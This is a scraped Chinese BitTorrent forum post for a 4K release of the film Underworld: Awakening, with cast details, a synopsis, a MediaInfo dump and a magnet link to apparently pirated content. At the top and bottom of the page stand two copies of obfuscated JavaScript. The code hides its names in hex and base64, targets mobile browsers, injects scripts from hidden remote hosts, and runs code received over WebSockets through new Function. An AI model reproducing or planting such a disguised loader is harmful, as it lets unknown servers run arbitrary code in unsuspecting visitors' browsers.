黑夜传说4:觉醒[中文字幕].Underworld.Awakening.2012.2160p.HDR.UHD.BluRay.TrueHD.7.1.Atmos.x265-10bit 10.78GB

版主小s 22天前 189

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 黑夜传说4:觉醒 / 决战异世界:未来复苏3D(台) / 妖夜寻狼:血姬觉醒(港) / Underworld 4: New Dawn

◎片 名 Underworld: Awakening

◎年 代 2012

◎产 地 美国

◎类 别 动作 / 惊悚 / 奇幻

◎语 言 英语

◎上映日期 2012-01-20(美国)

◎IMDb链接 https://www.imdb.com/title/tt1496025/

◎豆瓣评分 6.7/10 (48584人评价)

◎豆瓣链接 https://movie.douban.com/subject/3990098/

◎片 长 88分钟

◎导 演 曼斯·马林德 M?ns M?rlind (id:1023464)

比约恩·史坦 Bj?rn Stein (id:1042381)

◎编 剧 伦·怀斯曼 Len Wiseman (id:1031983)

J·迈克尔·斯特拉辛斯基 J. Michael Straczynski (id:1009530)

◎演 员 凯特·贝金赛尔 Kate Beckinsale (id:1003487)

英迪娅·埃斯利 India Eisley (id:1255528)

迈克尔·伊雷 Michael Ealy (id:1022673)

克里斯·霍尔登-里德 Kris Holden-Ried (id:1312827)

何家蓓 Sandrine Holt (id:1040704)

理查德·赛特伦 Richard Cetrone (id:1280368)

罗伯特·劳兰逊 Robert Lawrenson (id:1109294)

西奥·詹姆斯 Theo James (id:1314251)

查尔斯·丹斯 Charles Dance (id:1027299)

保罗·海斯林格 Paul Haslinger (id:1037358)

罗恩·布朗 Ronn Brown (id:1276400)

◎标 签 吸血鬼 / 狼人 / 美国 / 动作 / 魔幻 / 科幻 / 2012 / 奇幻

◎简 介

终于有一天,人类向日渐增多的血族和狼族宣战,这两个族群遭到大肆围剿与屠杀,人类取得绝对的优势。塞琳娜(凯特·贝金赛尔 Kate Beckinsale 饰)和约翰也在这场浩劫中遭难,当她再次醒来时,却发现自己被名为抗原研究所的机构囚禁起来,编号实验品1号。她奋力突破了束缚,根据共视的能力在黑暗的都市中寻找实验品2号——约翰。途中她遭遇血族的同伴相助以及狼人的袭击,当她找到被狼人们追逐的实验品2号时却发现,眼前竟是一个从没见过面但有着极为恐怖力量的小女孩——伊薇(英迪娅·埃斯利 India Eisley 饰),而她是血族与狼族的混血儿。

在这个陌生的时代,塞琳娜注定继续过着血雨腥风的生活……

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 175204573692057966859486795994162505329 (0x83CF2C69A010962A3DF14A9E9B6FA671)

  4. Complete name : Underworld.Awaken[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 10.8 GiB

  8. Duration : 1 h 28 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 17.4 Mb/s

  11. Movie name : Underworld Awakening 2012 2160p HDR UHD BluRay TrueHD 7.1 Atmos [email protected]

  12. Encoded date : UTC 2021-11-11 08:23:12

  13. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  14. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  15. Video

  16. ID : 1

  17. Format : HEVC

  18. Format/Info : High Efficiency Video Coding

  19. Format profile : Main [email protected]@High

  20. HDR format : SMPTE ST 2086, HDR10 compatible

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 1 h 28 min

  23. Bit rate : 12.3 Mb/s

  24. Width : 3 840 pixels

  25. Height : 1 604 pixels

  26. Display aspect ratio : 2.40:1

  27. Frame rate mode : Constant

  28. Frame rate : 23.976 (24000/1001/53354) FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.083

  33. Stream size : 7.58 GiB (70%)

  34. Title : @HDSky

  35. Writing library : x265 - H.265/HEVC codec

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.2020

  40. Transfer characteristics : PQ

  41. Matrix coefficients : BT.2020 non-constant

  42. Mastering display color primaries : Display P3

  43. Mastering display luminance : min: 0.0020 cd/m2, max: 1000 cd/m2

  44. Maximum Content Light Level : 739 cd/m2

  45. Maximum Frame-Average Light Level : 331 cd/m2


  46. Audio

  47. ID : 2

  48. Format : MLP FBA 16-ch

  49. Format/Info : Meridian Lossless Packing FBA with 16-channel presentation

  50. Commercial name : Dolby TrueHD with Dolby Atmos

  51. Codec ID : A_TRUEHD

  52. Duration : 1 h 28 min

  53. Bit rate mode : Variable

  54. Bit rate : 5 020 kb/s

  55. Maximum bit rate : 8 295 kb/s

  56. Channel(s) : 8 channels

  57. Channel layout : L R C LFE Ls Rs Lb Rb

  58. Sampling rate : 48.0 kHz

  59. Frame rate : 1 200.000 FPS (40 SPF)

  60. Compression mode : Lossless

  61. Stream size : 3.10 GiB (29%)

  62. Title : English

  63. Language : English

  64. Default : Yes

  65. Forced : No

  66. Number of dynamic objects : 11

  67. Bed channel count : 1 channel

  68. Bed channel configuration : LFE


  69. Text #1

  70. ID : 3

  71. Format : PGS

  72. Muxing mode : zlib

  73. Codec ID : S_HDMV/PGS

  74. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  75. Duration : 1 h 21 min

  76. Bit rate : 24.5 kb/s

  77. Count of elements : 1704

  78. Stream size : 14.3 MiB (0%)

  79. Title : ENG

  80. Language : English

  81. Default : Yes

  82. Forced : No


  83. Text #2

  84. ID : 4

  85. Format : PGS

  86. Muxing mode : zlib

  87. Codec ID : S_HDMV/PGS

  88. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  89. Duration : 1 h 27 min

  90. Bit rate : 16.6 kb/s

  91. Count of elements : 1453

  92. Stream size : 10.4 MiB (0%)

  93. Title : CHS

  94. Language : Chinese

  95. Default : No

  96. Forced : No


  97. Text #3

  98. ID : 5

  99. Format : PGS

  100. Muxing mode : zlib

  101. Codec ID : S_HDMV/PGS

  102. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  103. Duration : 1 h 17 min

  104. Bit rate : 19.0 kb/s

  105. Count of elements : 1459

  106. Stream size : 10.6 MiB (0%)

  107. Title : CHT

  108. Language : Chinese

  109. Default : No

  110. Forced : No


  111. Text #4

  112. ID : 6

  113. Format : PGS

  114. Muxing mode : zlib

  115. Codec ID : S_HDMV/PGS

  116. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  117. Duration : 1 h 17 min

  118. Bit rate : 20.2 kb/s

  119. Count of elements : 1125

  120. Stream size : 11.2 MiB (0%)

  121. Title : CHS

  122. Language : Chinese

  123. Default : No

  124. Forced : No


  125. Text #5

  126. ID : 7

  127. Format : PGS

  128. Muxing mode : zlib

  129. Codec ID : S_HDMV/PGS

  130. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  131. Duration : 1 h 17 min

  132. Bit rate : 20.7 kb/s

  133. Count of elements : 1125

  134. Stream size : 11.5 MiB (0%)

  135. Title : CHT

  136. Language : Chinese

  137. Default : No

  138. Forced : No


  139. Text #6

  140. ID : 8

  141. Format : PGS

  142. Muxing mode : zlib

  143. Codec ID : S_HDMV/PGS

  144. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  145. Duration : 1 h 17 min

  146. Bit rate : 34.1 kb/s

  147. Count of elements : 1125

  148. Stream size : 19.0 MiB (0%)

  149. Title : CHS&ENG

  150. Language : Chinese

  151. Default : No

  152. Forced : No


  153. Text #7

  154. ID : 9

  155. Format : PGS

  156. Muxing mode : zlib

  157. Codec ID : S_HDMV/PGS

  158. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  159. Duration : 1 h 17 min

  160. Bit rate : 34.6 kb/s

  161. Count of elements : 1125

  162. Stream size : 19.2 MiB (0%)

  163. Title : CHT&ENG

  164. Language : Chinese

  165. Default : No

  166. Forced : No


  167. Menu

  168. 00:00:00.000 : en:Chapter 01

  169. 00:04:25.055 : en:Chapter 02

  170. 00:08:03.399 : en:Chapter 03

  171. 00:16:19.186 : en:Chapter 04

  172. 00:21:17.233 : en:Chapter 05

  173. 00:24:48.987 : en:Chapter 06

  174. 00:30:28.826 : en:Chapter 07

  175. 00:35:32.505 : en:Chapter 08

  176. 00:40:03.943 : en:Chapter 09

  177. 00:45:25.889 : en:Chapter 10

  178. 00:52:41.157 : en:Chapter 11

  179. 00:57:20.561 : en:Chapter 12

  180. 01:02:52.934 : en:Chapter 13

  181. 01:07:42.724 : en:Chapter 14

  182. 01:12:17.498 : en:Chapter 15

  183. 01:16:40.429 : en:Chapter 16




复制代码


TAGS 动作 奇幻 惊悚

磁力链:
  • magnet:?xt=urn:btih:7D32A9FBC0A7EF228F7E4AD53DEF2673B51C07C2

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};